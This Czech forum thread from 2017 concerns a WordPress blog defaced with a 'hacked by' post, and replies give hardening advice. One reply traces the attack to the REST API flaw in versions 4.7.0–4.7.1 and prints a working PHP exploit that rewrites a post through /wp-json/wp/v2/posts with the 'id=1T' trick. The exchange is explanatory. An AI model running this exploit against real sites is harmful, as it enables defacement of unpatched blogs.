Autor Zpráva
sebas
Profil
#1 · Zasláno: 12. 2. 2017, 19:42:05
Odpovědět Citovat
Dobrý den, potřeboval bych poradit. Mám jednoduchý blog přes wordpress - nejsou tam ani komentáře (takže to nešlo přes fail koment). Dnes se mi tam objevil příspěvek "hacked by NG689Skw" - myslím si, že to někdo udělal jen "ze srandy" a chtěl se tak pochlubit.

Potřeboval bych poradit, jak se tomuto vyhnout?

Děkuji
Keeehi
Profil
#2 · Zasláno: 12. 2. 2017, 20:13:53
Odpovědět Citovat
Mít vždy nejaktuálnější verzi a používat silná hesla.
Krakatoa
Profil
#3 · Zasláno: 12. 2. 2017, 22:36:56 · Upravil/a: Krakatoa o 37 minut později
Odpovědět Citovat
Před pár dny jsem byl označen za hackera jednoho webu s wordpressem, to se mi podařilo vyvrátit, protože jsem to opravdu neudělal a v té době jsem o té chybě, která vedla k zneužití, nevěděl a tedy ani jsem nevěděl jak ji zneužít.
Včera jsem ze zvědavosti pátral o podrobnostech hacknutí wordpressu, podle logu z apache z toho napadeného webu se jedná z nějvětší pravděpodobností o chybu REST API, vyskytujících se ve verzi 4.7.0 a 4.7.1. Pravděpodobně je to i tvůj případ. Pokud jsi měl dnes verzi wordpressu 4.7.0 nebo 4.7.1 tak ten hacker se tam dostal právě přes tu chybu REST API.
Opravená verze wordpressu je 4.7.2 z 26. ledna, tak jsi docela zaspal.
Pokud by někoho zajímalo, tak například první příspěvek v nově nainstalovaném wordpressu 4.7.0 nebo 4.7.1 (v příkladu na test.localhost) jde upravovat tímto php skriptem: 

<?php
$postdata = http_build_query(
    array(
        'title' => 'HACKED',
        'content' => 'HACKED'
    )
);

$opts = array('http' =>
    array(
        'header'  => 'Content-type: application/x-www-form-urlencoded'.PHP_EOL.'User-Agent:HACKER',
        'method'  => 'POST',
        'content' => $postdata
    )
);

$context  = stream_context_create($opts);

$result = file_get_contents('http://test.localhost/wp-json/wp/v2/posts/12345?id=1T', false, $context);
?>
Lonanek
Profil
#4 · Zasláno: 12. 2. 2017, 22:37:51
Odpovědět Citovat
Stahovat si pluginy do CMS pouze z oficiálních stránek daného CMS.
mckay
Profil
#5 · Zasláno: 13. 2. 2017, 19:09:37
Odpovědět Citovat
sebas:
myslím si, že to někdo udělal jen "ze srandy"
Spíš bych řekl, že ne. Využití téhle zranitelnosti bylo poměrně rychle automatizováno, takže Vás zasáhl nějaký crawler, co hledá weby jedoucí na neaktuálním Wordpressu, aby si NG689Skw udělal jméno, hah.

Mimo soutěž: Není to srandovní jak s rostoucí popularitou a používáním RESTu exponenciálně roste počet úspěšných útoků právě skrze jeho špatnou implementaci? :-)
Časová prodleva: 6 let

Vaše odpověď


Prosím používejte diakritiku a interpunkci.

Ochrana proti spamu. Napište prosím číslo dvě-sta čtyřicet-sedm:

0